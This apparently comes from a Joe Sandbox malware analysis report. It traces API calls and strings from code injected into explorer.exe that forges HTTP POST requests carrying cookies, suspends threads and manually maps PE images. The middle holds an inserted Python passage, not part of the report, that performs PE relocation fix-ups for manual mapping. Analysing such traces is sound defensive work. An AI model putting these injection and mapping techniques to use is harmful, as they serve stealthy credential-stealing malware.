                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383052
                        • wsprintfA.USER32 ref: 003830B9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 003830E5
                        • lstrcat.KERNEL32(?,{:!:}), ref: 003830F8
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00386038), ref: 00383109
                        • RtlMoveMemory.NTDLL(00000000), ref: 00383112
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                        • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                        • API String ID: 2886538537-1627781280
                        • Opcode ID: 8c8ef4c13eafa12b74e987183af7f99455696477ef6243bf768a48cd124aad1f
                        • Instruction ID: 07cadb73ba00b7c5833f2a3297aa3afcf20b6ada60beba10db6068709c52bfbc
                        • Opcode Fuzzy Hash: 8c8ef4c13eafa12b74e987183af7f99455696477ef6243bf768a48cd124aad1f
                        • Instruction Fuzzy Hash: 3631E2B13043466BD706BB258C5AF6F76AEEBC0B41F0044BCF9028B782DA75D94687A1
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0038322D
                        • wsprintfA.USER32 ref: 0038329E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 003832AF
                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 003832BE
                        • lstrlen.KERNEL32(00000000), ref: 003832C1
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003832D2
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                        • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                        • API String ID: 3430864794-1604029033
                        • Opcode ID: c4d3642fea1c8e0780450c7c8050064b24170977a46bf56d17259d1eef798312
                        • Instruction ID: 7b2d5141ab2b6eb8bc64b9da0d2e29c34e800de9a0ed202f03904dd558713fb6
                        • Opcode Fuzzy Hash: c4d3642fea1c8e0780450c7c8050064b24170977a46bf56d17259d1eef798312
                        • Instruction Fuzzy Hash: DE41C3B1108345AFD312EF10DC49E6FBBECFB88345F00096EF54296251DB749A48CBA6
                        APIs
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 00383455
                        • lstrcat.KERNEL32 ref: 003834AB
                          • Part of subcall function 00382FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00382FFA
                          • Part of subcall function 00382FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383024
                          • Part of subcall function 00382FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383052
                          • Part of subcall function 00382FAA: wsprintfA.USER32 ref: 003830B9
                          • Part of subcall function 00382FAA: lstrcat.KERNEL32(00000000,00000000), ref: 003830E5
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                          • Part of subcall function 0038105D: VirtualFree.KERNEL32(?,00000000,00008000,00382B4B), ref: 00381065
                        • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00383504
                        • StrToIntA.SHLWAPI(?,00000000,?), ref: 0038352B
                        • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0038358D
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 003835C1
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                        • String ID: $Content-Length:$POST
                        • API String ID: 2960674810-114478848
                        • Opcode ID: 6e23e4ab5ccfeef092bd13a73f05124a05493a69a5f0a1d8b2ba6bff8b6ff499
                        • Instruction ID: 4282e6c2cbf48f7a5f42be2cb3064ced81669e34c009174bf86bb3ef7effcf81
                        • Opcode Fuzzy Hash: 6e23e4ab5ccfeef092bd13a73f05124a05493a69a5f0a1d8b2ba6bff8b6ff499
                        • Instruction Fuzzy Hash: 8331C5F16083418BCB03FF64ED6A66A7BADBB85701F0504EDE9029B352DB34890DCB59
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 003816D9
                        • GetCurrentThreadId.KERNEL32 ref: 003816E1
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003816F1
                        • Thread32First.KERNEL32(00000000,0000001C), ref: 003816FF
                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0038171E
                        • SuspendThread.KERNEL32(00000000), ref: 0038172E
                        • CloseHandle.KERNEL32(00000000), ref: 0038173D
                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0038174D
                        • CloseHandle.KERNEL32(00000000), ref: 00381758
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                        • String ID:
                        • API String ID: 1467098526-0
                        • Opcode ID: 2e575342d2ff2e31b712bab611d092e2b78f8711e3e67719adb10d8e62120c50
                        • Instruction ID: bfc699058687c94dfeebad6b31bd5a89b37c32225844454788614183178f3f21
                        • Opcode Fuzzy Hash: 2e575342d2ff2e31b712bab611d092e2b78f8711e3e67719adb10d8e62120c50
                        • Instruction Fuzzy Hash: 30113CB2408302EBD713AF60AC48A6BBFACEF85705F05049DF68592550D730894A9BA7
                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                          • Part of subcall function 0038106C: lstrlen.KERNEL32(?,?,00000000,00000000,0038189F,74DE8A60,?,00000000), ref: 00381074
                          • Part of subcall function 0038106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00381086
                          • Part of subcall function 003817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 003817EE
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 003818FB
                        • wsprintfW.USER32 ref: 003819F2
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00381AD0
                        Strings
                        • POST, xrefs: 003819A0
                        • Content-Type: application/x-www-form-urlencoded, xrefs: 00381A34
                        • Accept: */*Referer: %S, xrefs: 003819E8
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                        • API String ID: 3833683434-704803497
                        • Opcode ID: 29c3579e5db7978b2c2d3f493804b766e5db91ca1a51850d7bcf85fea59fdb06
                        • Instruction ID: 354b93ae07ca9ea9612e605dda8fe991592b80a029be7bb6e194336ca1adca3e
                        • Opcode Fuzzy Hash: 29c3579e5db7978b2c2d3f493804b766e5db91ca1a51850d7bcf85fea59fdb06
                        • Instruction Fuzzy Hash: 9C8178B1608301AFD716AF68DC88A2BBBEDEB88744F0009ADF545D7251EB34DD46CB52
                        APIs
                          • Part of subcall function 0038104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00382A16,?,00000001), ref: 00381056
                        • lstrcat.KERNEL32(?,00000000), ref: 003825BB
                        • lstrcat.KERNEL32(?,003842A8), ref: 003825C7
                        • lstrcat.KERNEL32(?,?), ref: 003825D6
                        • lstrcat.KERNEL32(?,003842AC), ref: 003825E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrcat$AllocVirtual
                        • String ID: :authority$?$dyn_header
                        • API String ID: 3028025275-1785586894
                        • Opcode ID: dfbef1308e70accbe8a799cc4f34606cc4c6cf622edd7ec9b035da6f20b98579
                        • Instruction ID: 517fb9377187727d693ae09e54ff20d09c72de8d4b0d492439134237ce45a148
                        • Opcode Fuzzy Hash: dfbef1308e70accbe8a799cc4f34606cc4c6cf622edd7ec9b035da6f20b98579
                        • Instruction Fuzzy Hash: 8A61F4725083128FC712FF25949066BB7DAABD4310F4509ADF8815B282E7789D0EDB63
                        APIs
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                        • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0038291B
                        • lstrcat.KERNEL32(?,003842BC), ref: 0038292A
                        • lstrlen.KERNEL32(?,74DE8A60,00000001,?,?,00000000,?,?,00382B26,?,?,?,?,00000001), ref: 0038295C
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$MemoryMovelstrcat
                        • String ID: cookie
                        • API String ID: 2957667536-1295510418
                        • Opcode ID: bf54d09622cf709df4c692cb51ccac6f269dd584ff6fb870f9a9e007a25f7ed8
                        • Instruction ID: abd6cc16b21dede99186e283de35374d4cbaabd7b500a8a900e8d8795561293a
                        • Opcode Fuzzy Hash: bf54d09622cf709df4c692cb51ccac6f269dd584ff6fb870f9a9e007a25f7ed8
                        • Instruction Fuzzy Hash: 8B1106723083029BC713BF98DC85BABB7E9EB80710F1505ADFD0197641EBB1E90A4391
                        APIs
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 00383332
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 00383358
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID: 8`8$POST
                        • API String ID: 3168844106-697272677
                        • Opcode ID: 2e59c4a891d730ab559cfadb4a7836da4c2da07c9888bc96c72d6bdc12c6f45c
                        • Instruction ID: b40f0e3ff46f9905e7421299da68f5d996d0ce42bf82e802be5ecf5b71ad7877
                        • Opcode Fuzzy Hash: 2e59c4a891d730ab559cfadb4a7836da4c2da07c9888bc96c72d6bdc12c6f45c
                        • Instruction Fuzzy Hash: 2B016D75504314EBCB233F20EC4985F7B6DEE85BA1B1940A0FA0A9A221DF31D951D7A1
                        APIs
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00381E83
                        • LoadLibraryA.KERNEL32(?,00386058,00000000,00000000,74DF2EE0,00000000,003820DC,?), ref: 00381EAB
                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00381ED8
                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00381F29
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                        • String ID:
                        • API String ID: 3827878703-0
                        • Opcode ID: 849f30e96c1a80683f96b46e9d4e56458c52d4400d7f032e43962039f23bd457
                        • Instruction ID: 243ec1dd1bcf430115aa87ef86bdcba57cdaf9d89b58fe154b124e9da1104930
                        • Opcode Fuzzy Hash: 849f30e96c1a80683f96b46e9d4e56458c52d4400d7f032e43962039f23bd457
                        • Instruction Fuzzy Hash: FD31AE72704316ABCB26DF29CC84BA6B7ACFF15354F1545ACE946CB600D731E846CBA0
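The sequence above (copy the image in with RtlMoveMemory, resolve imports with LoadLibraryA and GetProcAddress, then call ntdll!LdrProcessRelocationBlock) is consistent with manual mapping of a PE image instead of loading it through the OS image loader. As an added example, not code from the report, the sandbox or the sample, the Python below performs the same relocation fix-up on a constructed image buffer: it walks IMAGE_BASE_RELOCATION blocks (DWORD page RVA, DWORD block size, then 16-bit entries with a 4-bit type and a 12-bit offset) and adds the load delta to each HIGHLOW or DIR64 target, skipping the ABSOLUTE padding entries. Layout and type codes are those of winnt.h; the image, its pointers and its .reloc block are constructed inline and are not taken from the sample.

```python
import struct
from typing import List, Tuple

# Added example, not code from the report or from the sample. It reproduces the
# fix-up that ntdll!LdrProcessRelocationBlock performs for one IMAGE_BASE_RELOCATION
# block of a manually mapped image. Layout and type numbers follow winnt.h.

IMAGE_REL_BASED_ABSOLUTE = 0     # padding entry that keeps a block DWORD-aligned; skipped
IMAGE_REL_BASED_HIGHLOW = 3      # 32-bit absolute address (x86 images)
IMAGE_REL_BASED_DIR64 = 10       # 64-bit absolute address (x64 images)

Block = Tuple[int, List[Tuple[int, int]]]          # (page RVA, [(type, offset), ...])

def parse_reloc_directory(data: bytes) -> List[Block]:
    """Walk a .reloc directory: DWORD VirtualAddress, DWORD SizeOfBlock, then WORD entries."""
    blocks, pos = [], 0
    while pos + 8 <= len(data):
        page_rva, size = struct.unpack_from("<II", data, pos)
        if size < 8 or size % 2 or pos + size > len(data):
            raise ValueError(f"malformed IMAGE_BASE_RELOCATION at offset {pos:#x}")
        count = (size - 8) // 2
        entries = struct.unpack_from(f"<{count}H", data, pos + 8)
        blocks.append((page_rva, [(e >> 12, e & 0xFFF) for e in entries]))   # type:4 | offset:12
        pos += size
    return blocks

def process_relocation_block(image: bytearray, page_rva: int,
                             entries: List[Tuple[int, int]], delta: int) -> int:
    """Apply one block in place and return the number of fix-ups written."""
    done = 0
    for typ, off in entries:
        target = page_rva + off
        if typ == IMAGE_REL_BASED_ABSOLUTE:
            continue
        if typ == IMAGE_REL_BASED_HIGHLOW:
            fmt, mask = "<I", 0xFFFFFFFF
        elif typ == IMAGE_REL_BASED_DIR64:
            fmt, mask = "<Q", 0xFFFFFFFFFFFFFFFF
        else:
            raise ValueError(f"unsupported relocation type {typ} at RVA {target:#x}")
        if target + struct.calcsize(fmt) > len(image):
            raise ValueError(f"relocation target {target:#x} lies outside the image")
        (value,) = struct.unpack_from(fmt, image, target)
        struct.pack_into(fmt, image, target, (value + delta) & mask)
        done += 1
    return done

def relocate_image(image: bytearray, reloc_rva: int, reloc_size: int,
                   preferred_base: int, actual_base: int) -> int:
    """Rebase an image laid out at its RVAs; returns the total number of fix-ups."""
    delta = actual_base - preferred_base
    if delta == 0:
        return 0                       # mapped at ImageBase: nothing to patch
    directory = bytes(image[reloc_rva:reloc_rva + reloc_size])
    return sum(process_relocation_block(image, rva, entries, delta)
               for rva, entries in parse_reloc_directory(directory))

def read_ptr(image: bytearray, rva: int, x64: bool = False) -> int:
    return struct.unpack_from("<Q" if x64 else "<I", image, rva)[0]

def build_sample_image(x64: bool = False) -> Tuple[bytearray, int, int, int]:
    """Constructed toy image (not a real PE and not from the sample): three absolute
    pointers in the page at RVA 0x1000 and a one-block .reloc directory at RVA 0x1800.
    Returns (image, reloc_rva, reloc_size, preferred_base)."""
    preferred = 0x180000000 if x64 else 0x00400000
    fmt, typ = ("<Q", IMAGE_REL_BASED_DIR64) if x64 else ("<I", IMAGE_REL_BASED_HIGHLOW)
    img = bytearray(0x2000)
    for off, rva in ((0x010, 0x1234), (0x020, 0x1F00), (0x030, 0x0040)):
        struct.pack_into(fmt, img, 0x1000 + off, preferred + rva)
    entries = [(typ << 12) | 0x010, (typ << 12) | 0x020, (typ << 12) | 0x030,
               IMAGE_REL_BASED_ABSOLUTE << 12]           # pad block size to a multiple of 4
    block = struct.pack("<II", 0x1000, 8 + 2 * len(entries)) + struct.pack("<4H", *entries)
    img[0x1800:0x1800 + len(block)] = block
    return img, 0x1800, len(block), preferred

if __name__ == "__main__":
    img, rva, size, base = build_sample_image()
    n = relocate_image(img, rva, size, base, 0x10000000)
    print(f"{n} fix-ups applied; pointer at RVA 0x1010 is now {read_ptr(img, 0x1010):#010x}")
```

The bounds checks on block size and target offset are what an in-process loader typically omits; when carving a manually mapped image out of a memory dump such as the one this report was produced from, a damaged or truncated .reloc directory is common, and the parser should fail loudly rather than patch the wrong bytes.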
                        APIs
                        • OpenProcess.KERNEL32(00000400,00000000), ref: 003812BC
                        • IsWow64Process.KERNEL32(000000FF,?), ref: 003812CE
                        • IsWow64Process.KERNEL32(00000000,?), ref: 003812E1
                        • CloseHandle.KERNEL32(00000000), ref: 003812F7
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process$Wow64$CloseHandleOpen
                        • String ID:
                        • API String ID: 331459951-0
                        • Opcode ID: 3ff4b095607d1898fa85e4e11698cfc4750fe726bb9ef9735977d7808fa90168
                        • Instruction ID: 6c40d89ff50ae6351f39cdc7feeff0d7e0c93de6ec67ccd5829a9baeccc2c175
                        • Opcode Fuzzy Hash: 3ff4b095607d1898fa85e4e11698cfc4750fe726bb9ef9735977d7808fa90168
                        • Instruction Fuzzy Hash: E8F090B1806319FFDB22DFA0AD449EFB76CEA01351F2042EAE901D2140D7314E0297A1
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 003833D5
                          • Part of subcall function 00383132: lstrlen.KERNEL32(00000000), ref: 0038322D
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 003833F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$CloseCreateEnterHandleLeaveQueryThreadVirtuallstrlen
                        • String ID: 8`8
                        • API String ID: 3739322420-2563161603
                        • Opcode ID: bab1d81c8ff765e3afc07fe47cad0117e6f82e1805967be934faa0f01e50ca0d
                        • Instruction ID: 6efc3a53ac29ab230f94af4b106e6483ecd24fb92bf6506a427d483ba63b6a1f
                        • Opcode Fuzzy Hash: bab1d81c8ff765e3afc07fe47cad0117e6f82e1805967be934faa0f01e50ca0d
                        • Instruction Fuzzy Hash: 77E0ED7520430997CB02BF50D94ABAF7779FBD0B42F5000A5BA015A291CB749956CBA1
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 0038341D
                          • Part of subcall function 00383132: lstrlen.KERNEL32(00000000), ref: 0038322D
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 0038343B
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$CloseCreateEnterHandleLeaveQueryThreadVirtuallstrlen
                        • String ID: 8`8
                        • API String ID: 3739322420-2563161603
                        • Opcode ID: 3eec3285d1687fe8fa123858a211477c8bb28e5efe1d90f90dc0365b4601050b
                        • Instruction ID: bf4972febd58af5f84dadc407cce7340c27a6c14e50ec4ea07f04963e7cd47de
                        • Opcode Fuzzy Hash: 3eec3285d1687fe8fa123858a211477c8bb28e5efe1d90f90dc0365b4601050b
                        • Instruction Fuzzy Hash: DAE09A30204308EBCB03BF50DC49BAE737ABBC0B01F0080E5BA115B3A1CB708A02CB52
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 0038338D
                          • Part of subcall function 00383132: lstrlen.KERNEL32(00000000), ref: 0038322D
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 003833AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$CloseCreateEnterHandleLeaveQueryThreadVirtuallstrlen
                        • String ID: 8`8
                        • API String ID: 3739322420-2563161603
                        • Opcode ID: 4dc35a57d69e1cfbdf7981d917a25061912a50481c29520ffe567b2f8b64bfcb
                        • Instruction ID: aade28ccf7f08dc805b1dd71376eab27b076445c0a7780384cb69cfedae5aa2e
                        • Opcode Fuzzy Hash: 4dc35a57d69e1cfbdf7981d917a25061912a50481c29520ffe567b2f8b64bfcb
                        • Instruction Fuzzy Hash: 5BE06D7420430997CB03BF50D94ABAE7779ABC0B41F4000A4BA016A391CA709856CBA1

                        Execution Graph

                        Execution Coverage: 7.8%
                        Dynamic/Decrypted Code Coverage: 43.1%
                        Signature Coverage: 0%
                        Total number of Nodes: 51
                        Total number of Limit Nodes: 5


                        Control-flow Graph

                        APIs
                        • FindFirstFileW.KERNELBASE ref: 00CA1E03
                        • FindNextFileW.KERNELBASE ref: 00CA1E7B
                        • FindClose.KERNELBASE ref: 00CA1E88
                          • Part of subcall function 00CA1EB4: FindFirstFileW.KERNELBASE ref: 00CA1F05
                          • Part of subcall function 00CA1EB4: FindNextFileW.KERNELBASE ref: 00CA1F7C
                          • Part of subcall function 00CA1EB4: FindClose.KERNELBASE ref: 00CA1F89
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                        • Instruction ID: 3b09bc9258ebc9c93ee87b178c5db0792f2dd5519d818a8982913b2c979b2f02
                        • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                        • Instruction Fuzzy Hash: 5621C33021CE094BDB48FB2CA89D2A933D1EB99354F04066DEC5EC3296DE3899058789

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00CA1DB0: FindFirstFileW.KERNELBASE ref: 00CA1E03
                          • Part of subcall function 00CA1DB0: FindNextFileW.KERNELBASE ref: 00CA1E7B
                          • Part of subcall function 00CA1DB0: FindClose.KERNELBASE ref: 00CA1E88
                        • FindFirstFileW.KERNELBASE ref: 00CA1F05
                        • FindNextFileW.KERNELBASE ref: 00CA1F7C
                        • FindClose.KERNELBASE ref: 00CA1F89
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                        • Instruction ID: de4b23357dcfac6a0f7caa9a4fe0b9e599338d32b8a7c7d465b47eb659b0ec7b
                        • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                        • Instruction Fuzzy Hash: A221867020CB484FDF44FF6898983A977E1FBA9348F04066DA95EC3292DF38DA448785

                        Control-flow Graph

                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 00CA5378
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                        • Instruction ID: b038c54e32bc9b9ac30473c9c6d3a259e84b6544f1cde80b57b8e89b9a58f644
                        • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                        • Instruction Fuzzy Hash: AF110660602D0A4FEF5CF7F954992793395EB56305F54403AE82AC72A2DA298A408300

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CA1D1D
                        • Process32First.KERNEL32 ref: 00CA1D3C
                        • lstrcmpi.KERNEL32 ref: 00CA1D4C
                        • Process32Next.KERNEL32 ref: 00CA1D67
                        • FindCloseChangeNotification.KERNELBASE ref: 00CA1D74
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 545148253-0
                        • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                        • Instruction ID: c413750b090e74d52628d794d9f200db68ba698c750089ea0f6349cf4fcceae5
                        • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                        • Instruction Fuzzy Hash: 6501A230208A098FD755EF28D8883AE76E2FBDD318F04072DA55EC7194DB38CA458B45

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 00CAD847
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00CAD8E5
                        • VirtualProtect.KERNELBASE ref: 00CAD903
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CAC000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CAC000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_cac000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                        • Instruction ID: 3b610dda8072a732c91eca8d69b3994cf4052b1a082b2f1eebbcdd072a0c9970
                        • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                        • Instruction Fuzzy Hash: DF517A3225491F0BCB28AB789CC43E5B7D1F757329B58063AD4ABC36C9EA58C94783C1

                        Control-flow Graph

                        APIs
                        Memory Dump Source
